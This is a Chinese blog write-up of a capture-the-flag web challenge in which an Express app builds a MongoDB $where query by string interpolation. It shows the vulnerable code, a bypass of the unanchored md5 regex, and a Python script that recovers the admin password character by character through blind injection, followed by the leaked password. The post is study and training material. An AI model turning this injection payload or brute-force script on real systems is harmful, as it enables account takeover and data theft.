[2021祥云杯]Package Manager 2021

最新推荐文章于 2024-05-04 09:52:37 发布
最新推荐文章于 2024-05-04 09:52:37 发布
阅读量665 收藏 1
点赞数 1
分类专栏: CTF刷题记录 文章标签: mongodb CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/124810618
版权

[2021祥云杯]Package Manager 2021

文章目录


下载附件 

cnpm install

安装对应的依赖

mongodb注入

通过schema.ts可以知道用的是mongoDB数据库

Mongoose 是一个让我们可以通过Node来操作MongoDB数据库的一个模块

在这里插入图片描述

然后在index.ts中的/auth路由存在sql注入漏洞

router.get('/auth', (_, res) => res.render('auth'))

router.post('/auth', async (req, res) => {
	let { token } = req.body;
	if (token !== '' && typeof (token) === 'string') {
		if (checkmd5Regex(token)) {
			try {
				//这里存在sql注入漏洞
				let docs = await User.$where(`this.username == "admin" && hex_md5(this.password) == "${token.toString()}"`).exec()
				console.log(docs);
				if (docs.length == 1) {
					if (!(docs[0].isAdmin === true)) {
						return res.render('auth', { error: 'Failed to auth' })
					}
				} else {
					return res.render('auth', { error: 'No matching results' })
				}
			} catch (err) {
				return res.render('auth', { error: err })
			}
		} else {
			return res.render('auth', { error: 'Token must be valid md5 string' })
		}
	} else {
		return res.render('auth', { error: 'Parameters error' })
	}
	req.session.AccessGranted = true
	res.redirect('/packages/submit')
});

虽然在token之前要经过checkmd5Regex函数的检测,但是我们跟进查看这个函数

在正则匹配的时候,没有用^$匹配头部或者尾部,所以存在绕过

只需要在token的前面放上一串32长度的字符串aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,就可以满足这个匹配

const checkmd5Regex = (token: string) => {
  return /([a-f\d]{32}|[A-F\d]{32})/.exec(token);
}

我们可以写一个脚本来将admin的password爆破出来

import requests
import string

url = "http://b5c92fb4-2133-499b-ae04-4dadb381e5bf.node4.buuoj.cn:81/auth"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.47",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Referer": "http://b5c92fb4-2133-499b-ae04-4dadb381e5bf.node4.buuoj.cn:81/auth",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Cookie": "UM_distinctid=17f8d34a7f932c-0e50148d0f032b-56171d51-144000-17f8d34a7fae31; session=s%3A9hzuyZljr-wg3Dt2h0JoUGgeTX1uugga.e27PI%2Bcl9%2FuQQ1%2BqtdpsqVKjKtpSuFaq0lDZzPHEMVY",
    "Upgrade-Insecure-Requests": "1",
}
flag = ''
for i in range(100):
    print(i)
    for j in string.printable:
        data = {
            "_csrf":"sTH9KGXQ-zU7GcLfhx27sRaW9gCxEIqaFWrQ",
            "token":'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"||this.password[{}]=="{}'.format(i,j),
        }
        # print(data)
        r = requests.post(url = url ,headers= headers,data=data,allow_redirects=False)
        if "Found. Redirecting to"  in r.text:
            flag  = flag+j
            print(flag)
            break
# print(string.printable)
# 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

运行结果

在这里插入图片描述

登录即可

另一种解法:抛出异常

MongoDB支持js的语法,所以可以用js语法去抛出内容为admin密码的异常。

在这里插入图片描述

密码

!@#&@&@efefef*@((@))grgregret3r

登录即可得flag

在这里插入图片描述

Sk1y
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020祥云 CTFNu1L.pdf
03-15
2020祥云 CTF WP 高清PDF版
祥云2021题目汇总 祥云.7z
08-31
祥云2021题目汇总 祥云.7z
祥云2021 Web复现
feng的博客
08-25 1802
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
Unity 2021 Package Manager变化以及安装Memory Profiler
常城的专栏
08-19 5506
使用Unity 2021.1,Package Manager有了比较大的变化,整整浪费了我几个小时的时间才弄明白,并且安装好Memory Profiler。下面记录一下: 全新的Package Manager,三种类型的包: Release:(直接能在Package Manager窗口里看到的) 直接能在Package Manager窗口里看到的这些包,它们的发布是经过测试、验证的。可以安全的用于项目。 Pre-release:(预发布包,需要开启设置才能看到) 预发布包由 Unity 官
2021祥云
qq_48511129的博客
12-13 1031
安全检测 尝试用admin/admin登录,发现成功登录 输入一个百度的地址,发现跳转到了百度。 于是尝试能不能跳转到本地http://127.0.0.1发现无法跳转 网站很多都有一个admin后台目录,接着尝试能不能跳转到该目录 发现成功跳转 看到include123.php文件,于是接着跳转到该文件下面 发现了一些php代码 发现对get传的参数过滤了很多东西。本地文件包含,远程文件包含命令执行等基本都过滤了。 暑假做题的时候做到了一道类似的题,把这些都过滤了,他用的方法是用session文件包含,因为
WP-2021祥云
ce666666的博客
01-16 652
前言 好多审计题,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的题目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这题就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
祥云2021web writeup
hezhing
08-27 2783
太菜了,一个web都没做出来。接下来是复现。好好学习一下大佬们的姿势,也记录一下。 参考师傅们的wp,网上有的,侵权删。
2020祥云网络安全大赛 MISC Writeup
末初的CSDN博客
11-23 5033
文章目录签到进制反转到点了xixixi带音乐家 签到 PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZ3txcV9ncm91cF84MjY1NjYwNDB9'));" string(24) "flag{qq_group_826566040}" 进制反转 题目描述: 电脑中到底使用的是什么进制呢?真是麻烦,有时候还是手机好用。结果用flag{}包住,并且全为大写 WinRAR打开显示文件头损坏,其次有加密,猜测RA
2021牛气冲天PPT模板
07-16
PPT模板封面使用了金色玉兰花、灯笼、祥云、金牛等背景图片。中间放置黑色毛笔书法字书写的 牛气冲天PPT标题。界面精致喜庆。 PowerPoint模板内容页,由23张红色灰色配色的幻灯片图表,搭配PPT文字排版。另外使用了...
牛运当头2021牛年新年活动策划PPT模板
07-16
PPT模板封面使用了金色祥云背景图片。左侧放置黑色毛笔字书写的牛运当头PPT艺术字,右侧填写2021新年活动策划PPT标题。界面风格精致喜庆。 PowerPoint模板内容页,由23张金色幻灯片图表,搭配活动策划文案排版。另外...
精美蓝红配色的2021牛年新年PPT模板
07-16
PPT封面使用了梅花、祥云、卡通福牛、烫金2021艺术字等背景图案。界面精美喜庆。 PowerPoint模板内容页,由23张金色渐变幻灯片图表,搭配PPT文字排版。另外使用了金牛图案、福字图案、灯笼图案、锣鼓图案等装饰。 本...
BUU刷题记录——7
weixin_43610673的博客
02-20 3020
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不传值得话就可以进入if语句,跟进_fo
buu-day05
anwen12的博客
01-03 647
0x01 [NPUCTF2020]验证???? str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '') 第一步是一个弱类型比较,下面有两个常用的比较方式 a[]=a&b[]=a a='1' &b=[1] 注意第二种方式必须使用json格式进行传输,不然[1]会被解析成为字符串。很显然这里使用第二种。 第二步就是研究上面这个正则表达式了。一共分为3个
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4273
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
2021第二届“祥云”网络安全大赛 部分Writeup
qq_42815161的博客
08-23 3290
MISC ChieftainsSecret 题目描述:Our agent risked his life to install a mysterious device in the immemorial telephone, can you find out the chieftain's telephone number? Flag format: flag{11 digits} ChieftainsSecret.jpg题目附件给了一张老式轮盘电话机图片,猜测图片藏了东西,直接上linux分
mongoDB
m0_64021225的博客
05-04 946
MongoDB和MySQL的对比以及MongoDB的集成
node-v4.8.6-win-x64.zip
最新发布
05-07
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
在关卡「玉兔祥云」中,如果一次游玩(中途不复活)共计燃放了 10 10 枚烟花,则会令关卡最后一个场景切换为新场景(一次游玩最多燃放 10 10 枚烟花)。 陈佳雨现在在玩这一关,现在她知道她一共通了这一关 � x 次(在现实中,陈佳雨不可能通关这一关的),并且她知道她一共燃放了 � y 枚烟花,但是她玩得太投入,不知道触发了几次新场景,请你分别计算出来最少和最多触发场景次数。 输入格式 一行,两个整数 � , � x,y。 输出格式 一行,两个整数,分别为最少次数和最多次数。
07-08
对于最少触发场景次数,我们可以假设每次通关都刚好燃放了10枚烟花。那么最少触发场景次数就是燃放的烟花数除以10的结果。 对于最多触发场景次数,我们可以假设前x-1次通关都刚好燃放了10枚烟花,最后一次通关燃放的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值